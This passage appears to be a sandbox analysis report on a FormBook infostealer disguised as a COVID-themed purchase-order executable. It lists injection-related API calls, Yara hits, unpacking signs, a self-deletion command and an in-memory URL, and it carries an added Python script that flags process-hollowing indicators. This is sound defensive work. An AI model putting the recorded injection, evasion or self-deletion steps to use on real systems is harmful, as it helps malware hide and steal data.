Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C99A0 NtCreateSection, LdrInitializeThunk | 14_2_045C99A0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9A50 NtCreateFile, LdrInitializeThunk | 14_2_045C9A50
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9560 NtWriteFile | 14_2_045C9560
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045CAD30 NtSetContextThread | 14_2_045CAD30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9520 NtWaitForSingleObject | 14_2_045C9520
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C95F0 NtQueryInformationFile | 14_2_045C95F0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9670 NtQueryInformationProcess | 14_2_045C9670
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9610 NtEnumerateValueKey | 14_2_045C9610
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045CA770 NtOpenThread | 14_2_045CA770
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9770 NtSetInformationFile | 14_2_045C9770
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9760 NtOpenProcess | 14_2_045C9760
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045CA710 NtOpenProcessToken | 14_2_045CA710
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9730 NtQueryVirtualMemory | 14_2_045C9730
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C97A0 NtUnmapViewOfSection | 14_2_045C97A0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045CB040 NtSuspendThread | 14_2_045CB040
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9820 NtEnumerateKey | 14_2_045C9820
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C98F0 NtReadVirtualMemory | 14_2_045C98F0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C98A0 NtWriteVirtualMemory | 14_2_045C98A0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9950 NtQueueApcThread | 14_2_045C9950
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C99D0 NtCreateProcessEx | 14_2_045C99D0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9A10 NtQuerySection | 14_2_045C9A10
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9A00 NtProtectVirtualMemory | 14_2_045C9A00
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9A20 NtResumeThread | 14_2_045C9A20
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9A80 NtOpenDirectoryObject | 14_2_045C9A80
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9B00 NtSetValueKey | 14_2_045C9B00
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045CA3B0 NtGetContextThread | 14_2_045CA3B0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0069A070 NtClose | 14_2_0069A070
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0069A120 NtAllocateVirtualMemory | 14_2_0069A120
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00699F40 NtCreateFile | 14_2_00699F40
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00699FF0 NtReadFile | 14_2_00699FF0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0069A072 NtClose | 14_2_0069A072
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0069A11B NtAllocateVirtualMemory | 14_2_0069A11B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00699F3A NtCreateFile | 14_2_00699F3A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00699FEA NtReadFile | 14_2_00699FEA
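The rows above are what an analyst actually works from: which process (PID 3, the sample's second instance; PID 14, msiexec.exe) carries the native-call set that process hollowing needs, and which memory dumps the FormBook Yara rules hit in. The following is an added triage script, not part of this report or of Joe Sandbox, that parses the three row types in this section (memory-string hits, Yara matches, and native-API code functions), tolerating the fused column layout of a text export, and reduces them to per-process flags. The dump-name layout (pid.stage.dump id.base.protection.type, hex fields, so 0000000E is PID 14) is an assumption inferred from the identifiers on this page; the PAGE_* names are the documented Win32 memory-protection constants. The sample rows are copied from this section.

```python
"""Per-process triage of Joe Sandbox-style indicator rows (added example, not
report or vendor code). Assumed dump-name layout, inferred from this page:
<pid>.<stage>.<dump id>.<base>.<protection>.<type>.sdmp, hex except <dump id>."""
import re
from collections import defaultdict

PAGE_PROTECTION = {  # documented Win32 constants
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Hollowing: unmap the target image, get a new one in (write or map a section),
# point the thread at it, resume it. NtQueueApcThread is a separate trigger.
HOLLOWING_CORE = {"NtUnmapViewOfSection", "NtSetContextThread", "NtResumeThread"}
HOLLOWING_WRITE = {"NtWriteVirtualMemory", "NtMapViewOfSection"}
APC_TRIGGER = {"NtQueueApcThread"}

DUMP_RE = re.compile(r"(?P<pid>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})"
                     r"\.(?P<prot>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp")
UNPACK_RE = re.compile(r"(?P<pid>\d+)\.\d+\..+?\.unpack")
CODE_RE = re.compile(r"Code function: (?P<fid>(?P<pid>\d+)_\d+_[0-9A-Fa-f]{8}) ?(?P<rest>.*)$")
RULE_RE = re.compile(r"Matched rule: (?P<rule>.+?) Author: ")
STRING_TAG = "String found in binary or memory:"

# Constructed input: rows copied from this section, some in the fused export
# form ("...exeCode function: ... NtClose,3_2_0041A070"), some re-separated.
SAMPLE_ROWS = r"""
Source: Yara matchFile source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041A070 NtClose,3_2_0041A070
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_015597A0 NtUnmapViewOfSection, LdrInitializeThunk | 3_2_015597A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_015598A0 NtWriteVirtualMemory | 3_2_015598A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_0155AD30 NtSetContextThread | 3_2_0155AD30
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559A20 NtResumeThread, LdrInitializeThunk | 3_2_01559A20
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: 3_2_01559950 NtQueueApcThread | 3_2_01559950
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9780 NtMapViewOfSection, LdrInitializeThunk | 14_2_045C9780
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C97A0 NtUnmapViewOfSection | 14_2_045C97A0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045CAD30 NtSetContextThread | 14_2_045CAD30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_045C9A20 NtResumeThread | 14_2_045C9A20
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C9950 NtQueueApcThread,14_2_045C9950
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC21D90_2_00BC21D9
Source: explorer.exe, 00000004.00000000.277115115.0000000008B40000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: msiexec.exe, 0000000E.00000002.622832165.000000000501F000.00000004.00000001.sdmpString found in binary or memory: https://www.johnemotions.com/p95n/?oH5h=OkCbzDuuF1pG8/
"""


def protection_name(value):
    """Decode a PAGE_* constant; unknown combinations come back as hex."""
    return PAGE_PROTECTION.get(value, f"0x{value:X}")


def parse_rows(text):
    """Yield (kind, pid, payload) for code-function, Yara and string rows."""
    for line in text.splitlines():
        line = line.strip()
        m = CODE_RE.search(line)
        if m:
            rest = m["rest"].strip()
            if rest.endswith(m["fid"]):          # drop the duplicated id column
                rest = rest[: -len(m["fid"])]
            apis = [a.strip() for a in rest.replace("|", ",").split(",") if a.strip()]
            yield "code", int(m["pid"]), apis
        elif "Matched rule:" in line or "File source:" in line:
            rule = RULE_RE.search(line)
            hit = {"rule": rule["rule"] if rule else None}
            for d in DUMP_RE.finditer(line):
                yield "yara", int(d["pid"], 16), dict(hit, base=int(d["base"], 16), prot=int(d["prot"], 16))
            u = UNPACK_RE.search(line)
            if u:                                  # dumped-and-unpacked PE image, no region info
                yield "yara", int(u["pid"]), dict(hit, base=None, prot=None)
        elif STRING_TAG in line:
            url = line.rsplit(STRING_TAG, 1)[1].strip()
            for d in DUMP_RE.finditer(line):
                yield "string", int(d["pid"], 16), url


def triage(text):
    """Group indicators by PID and derive per-process flags."""
    apis, yara, strings = defaultdict(set), defaultdict(list), defaultdict(set)
    for kind, pid, payload in parse_rows(text):
        {"code": apis[pid].update, "yara": yara[pid].append, "string": strings[pid].add}[kind](payload)
    verdict = {}
    for pid in sorted(set(apis) | set(yara) | set(strings)):
        flags, a = [], apis.get(pid, set())
        if HOLLOWING_CORE <= a and a & HOLLOWING_WRITE:
            flags.append("process-hollowing primitives")
        if APC_TRIGGER <= a:
            flags.append("APC injection primitive")
        rwx = [h for h in yara.get(pid, []) if h["prot"] == 0x40]
        if rwx:
            flags.append(f"Yara hit in {len(rwx)} {protection_name(0x40)} region(s)")
        verdict[pid] = flags
    return {"apis": dict(apis), "yara": dict(yara), "strings": dict(strings), "verdict": verdict}


if __name__ == "__main__":
    for pid, flags in triage(SAMPLE_ROWS)["verdict"].items():
        print(pid, flags or "no injection indicators")
```

On the sample rows PID 3 and PID 14 both come out with the hollowing set, the APC trigger and a FormBook hit in an execute-read-write region, while PID 0 (the first, unpacking instance) and PID 4 (explorer.exe, whose only hit here is font-vendor text in a read-only region) get no flags. The verdict is only a first pass: it tells you where to look in the full report, not whether a process is malicious.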
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC21D90_2_00BC21D9
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC04700_2_00BC0470
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC17700_2_00BC1770
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC0EF80_2_00BC0EF8
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC40000_2_00BC4000
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC52300_2_00BC5230
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC52200_2_00BC5220
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC54380_2_00BC5438
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC54290_2_00BC5429
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC56980_2_00BC5698
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC56890_2_00BC5689
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC58520_2_00BC5852
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC0E780_2_00BC0E78
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC4E780_2_00BC4E78
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_00BC3FF00_2_00BC3FF0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_04BB26680_2_04BB2668
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_04BB058F0_2_04BB058F
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_04BB06B00_2_04BB06B0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 0_2_0974F5380_2_0974F538
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_004010263_2_00401026
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D1833_2_0041D183
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041D1863_2_0041D186
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041EB423_2_0041EB42
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041EC053_2_0041EC05
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0041E4CE3_2_0041E4CE
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00402D873_2_00402D87
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00409E403_2_00409E40
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151F9003_2_0151F900
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015341203_2_01534120
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D10023_2_015D1002
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015EE8243_2_015EE824
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E28EC3_2_015E28EC
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152B0903_2_0152B090
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015420A03_2_015420A0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E20A83_2_015E20A8
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E2B283_2_015E2B28
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D03DA3_2_015D03DA
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DDBD23_2_015DDBD2
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154EBB03_2_0154EBB0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E22AE3_2_015E22AE
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E1D553_2_015E1D55
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E2D073_2_015E2D07
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01510D203_2_01510D20
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E25DD3_2_015E25DD
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152D5E03_2_0152D5E0
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015425813_2_01542581
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DD4663_2_015DD466
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152841F3_2_0152841F
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015EDFCE3_2_015EDFCE
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E1FF13_2_015E1FF1
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DD6163_2_015DD616
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01536E303_2_01536E30
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E2EF73_2_015E2EF7
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Code function: String function: 0151B150 appears 45 times
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0458B150 appears 35 times
          Source: Po-covid19 2372#w2..exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Po-covid19 2372#w2..exe | Binary or memory string: OriginalFilename vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.250216585.0000000000B10000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.248339854.000000000017A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.263476801.0000000009000000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000002.00000000.244485591.000000000023A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000003.00000000.246312953.0000000000ABA000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000003.00000002.299564260.000000000179F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe, 00000003.00000002.298645878.000000000141F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemsiexec.exeX vs Po-covid19 2372#w2..exe
          Source: Po-covid19 2372#w2..exe | Binary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
          Source: Po-covid19 2372#w2..exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: Po-covid19 2372#w2..exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/1@6/4
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Po-covid19 2372#w2..exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Po-covid19 2372#w2..exe | ReversingLabs: Detection: 27%
          Source: unknown | Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
          Source: unknown | Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: unknown | Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: unknown | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Po-covid19 2372#w2..exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Po-covid19 2372#w2..exe | Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: Po-covid19 2372#w2..exe | Static file information: File size 1304576 > 1048576
          Source: Po-covid19 2372#w2..exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x106200
          Source: Po-covid19 2372#w2..exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msiexec.pdb | source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL | source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP | source: Po-covid19 2372#w2..exe, 00000003.00000002.299260110.000000000160F000.00000040.00000001.sdmp, msiexec.exe, 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb | source: Po-covid19 2372#w2..exe, msiexec.exe

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Unpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe | Unpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack
          Source: initial sample | Static PE information: section name: .text entropy: 7.44459929766

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
